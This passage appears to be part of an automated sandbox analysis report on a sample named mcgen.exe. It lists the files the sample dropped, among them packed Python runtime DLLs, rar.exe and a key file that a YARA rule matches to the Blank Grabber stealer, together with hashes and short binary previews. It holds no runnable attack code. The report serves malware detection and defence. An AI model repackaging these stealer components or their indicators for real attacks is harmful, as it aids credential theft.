File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	119949
Entropy (8bit):	7.685951389978537
Encrypted:	false
SSDEEP:	3072:RTNU1UmtZ9b+aHoCMl66/Yngmy2hFrcGPm7tFbPPT:JmhZ9b+aHag6/9mz2tLPT
MD5:	3D5FCDF08652A5B600AC384DE84425FE
SHA1:	4B2407E36997D9FDA2A47C4732ABAECF4F54A14A
SHA-256:	F22B36D9124E8287B7242C565418917179AB9C078D60B0D2BDD7487664E1DAD4
SHA-512:	EF4D745F3E49463934BE0D6C21565C7EAA20950743241128B6EECC140205BB0D7396C1AEAD8E64E5E0DE8393575FDAD4C33464D9DF7038321FBCF25EB8FB286D
Malicious:	false
Preview:	PK..........!Z .............stub-o.pyc..........ugz1.............................\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.S...r.S.r.\.".\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R.........

C:\Users\user\AppData\Local\Temp\_MEI32122\libcrypto-3.dll

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1630488
Entropy (8bit):	7.952879310777133
Encrypted:	false
SSDEEP:	49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
MD5:	8377FE5949527DD7BE7B827CB1FFD324
SHA1:	AA483A875CB06A86A371829372980D772FDA2BF9
SHA-256:	88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
SHA-512:	C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(. .......p:.`.P...:..................................0S...........`......................................... .P......P.h.....P...... L. .............S..................................... .P.@...........................................UPX0.....p:.............................UPX1..... ....:.....................@....rsrc.........P......"..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI32122\libffi-8.dll

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29968
Entropy (8bit):	7.677818197322094
Encrypted:	false
SSDEEP:	768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:	08B000C3D990BC018FCB91A1E175E06E
SHA1:	BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:	135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:	8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI32122\libssl-3.dll

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	227096
Entropy (8bit):	7.928768674438361
Encrypted:	false
SSDEEP:	6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
MD5:	B2E766F5CF6F9D4DCBE8537BC5BDED2F
SHA1:	331269521CE1AB76799E69E9AE1C3B565A838574
SHA-256:	3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
SHA-512:	5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..\|m..\|m..\|m.u.m..\|m+.}l..\|m.u}l..\|m+..l..\|m+.xl..\|m+.yl..\|m..}l..\|m..}m..\|m..xl..\|m..\|l..\|m...m..\|m..~l..\|mRich..\|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI32122\python313.dll

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1850360
Entropy (8bit):	7.9939340697016155
Encrypted:	true
SSDEEP:	49152:VfOZocB9lcRar86XqS2fUbe1F6lRiPp3UdwT6m5FmZ9UTCO:VYB9GRag6kfQe1kyx3UdzscZk
MD5:	9A3D3AE5745A79D276B05A85AEA02549
SHA1:	A5E60CAC2CA606DF4F7646D052A9C0EA813E7636
SHA-256:	09693BAB682495B01DE8A24C435CA5900E11D2D0F4F0807DAE278B3A94770889
SHA-512:	46840B820EE3C0FA511596124EB364DA993EC7AE1670843A15AFD40AC63F2C61846434BE84D191BD53F7F5F4E17FAD549795822BB2B9C792AC22A1C26E5ADF69
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F.r.'.!.'.!.'.!.. .'.!.z!.'.!.. .'.!.. .'.!.. .'.!._.!.'.!... .'.!.'.!N&.!F.. -'.!F.. .'.!F.x!.'.!F.. .'.!Rich.'.!........PE..d....WOg.........." ...*.0.......0J..]e..@J..................................Pf...........`.........................................H.e......ye......pe......P]..............Gf.,............................je.(...Pje.@...........................................UPX0.....0J.............................UPX1.....0...@J..,..................@....rsrc........pe......0..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI32122\rarreg.key

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	456
Entropy (8bit):	4.447296373872587
Encrypted:	false
SSDEEP:	12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:	4531984CAD7DACF24C086830068C4ABE
SHA1:	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:	00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rarreg.key, Author: Joe Security
Preview:	RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI32122\select.pyd

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27640
Entropy (8bit):	7.429887403983581
Encrypted:	false
SSDEEP:	768:DaWVMhw2pYjGIm9GtaJyUFRYT2Ip4HCxf1mlzzTz:OKE4jGIm9GtmyUzR9YfIPv
MD5:	933DA5361079FC8457E19ADAB86FF4E0
SHA1:	51BCCF47008130BAADD49A3F55F85FE968177233
SHA-256:	ADFDF84FF4639F8A921B78A2EFCE1B89265DF2B512DF05CE2859FC3CC6E33EFF
SHA-512:	0078CD5DF1B78D51B0ACB717E051E83CB18A9DAF499A959DA84A331FA7A839EEFA303672D741B29FF2E0C34D1EF3F07505609F1102E9E86FAB1C9FD066C67570
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ks{..(..(..(.R.(..(..)..(..)..(..)..(..)..(w..)..(..(..(...)..(w..)..(w..)..(w..(..(w..)..(Rich..(................PE..d....WOg.........." ....0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI32122\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	661360
Entropy (8bit):	7.993016249967087
Encrypted:	true
SSDEEP:	12288:fnhOhXqE88i5E+P5p6YOU7hN8QtcsWO4qlD0kHpM7rLXF81PrtKtD1Gj40QeqG+e:fnWaI6lP5+whKQusF44ZQ3sZKt1n0QC/
MD5:	FF62332FA199145AAF12314DBF9841A3
SHA1:	714A50B5351D5C8AFDDB16A4E51A8998F976DA65
SHA-256:	36E1C70AFC8AD8AFE4A4F3EF4F133390484BCA4EA76941CC55BAC7E9DF29EEFD
SHA-512:	EEFF68432570025550D4C205ABF585D2911E0FF59B6ECA062DD000087F96C7896BE91EDA7612666905445627FC3FC974AEA7C3428A708C7DE2CA14C7BCE5CCA5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7.x.7.x.7.x.>..;.x.&(y.5.x.&({.3.x.&(\|.?.x.&(}.:.x.E/y.4.x.7.y...x..(p.6.x..(x.6.x..(..6.x..(z.6.x.Rich7.x.........................PE..d....WOg.........." ...*.....0............................................................`..............................................#..............................................................................@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI32122\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\mcgen.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	269032
Entropy (8bit):	7.980717016340488
Encrypted:	false
SSDEEP:	6144:vFHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khEc9v:vtJlyHwqSBqpNsKUuntFJhMF9HC84v
MD5:	867ECDE9FF7F92D375165AE5F3C439CB
SHA1:	37D1AC339EB194CE98548AB4E4963FE30EA792AE
SHA-256:	A2061EF4DF5999CA0498BEE2C7DD321359040B1ACF08413C944D468969C27579
SHA-512:	0DCE05D080E59F98587BCE95B26A3B5D7910D4CB5434339810E2AAE8CFE38292F04C3B706FCD84957552041D4D8C9F36A1844A856D1729790160CEF296DCCFC2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b..Q&...&...&.../fY. ...7...$...7...%...7.......7...+.......%...T...$...&...i.......'.......'.....5.'.......'...Rich&...................PE..d....WOg.........." ...*.........0..0....@...................................0............`..........................................+..X....)....... .......................+..$...................................0...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3igtzphw.2ej.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41djjmpm.svq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5c5ksjjd.azz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5kosz3cj.jqo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ab4s3wbj.4po.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfos24vv.bhx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwbutuim.mkq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0cksed2.4i1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyyn3hpf.egf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lphg25db.lul.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgjjc1uy.0tr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkoudccm.4zz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0cwgzfn.tww.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oumpfgo1.yzm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p0xlvxnu.hj2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pafd2bux.zd1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qiju0psu.c2m.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r0cn4t5x.o1u.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
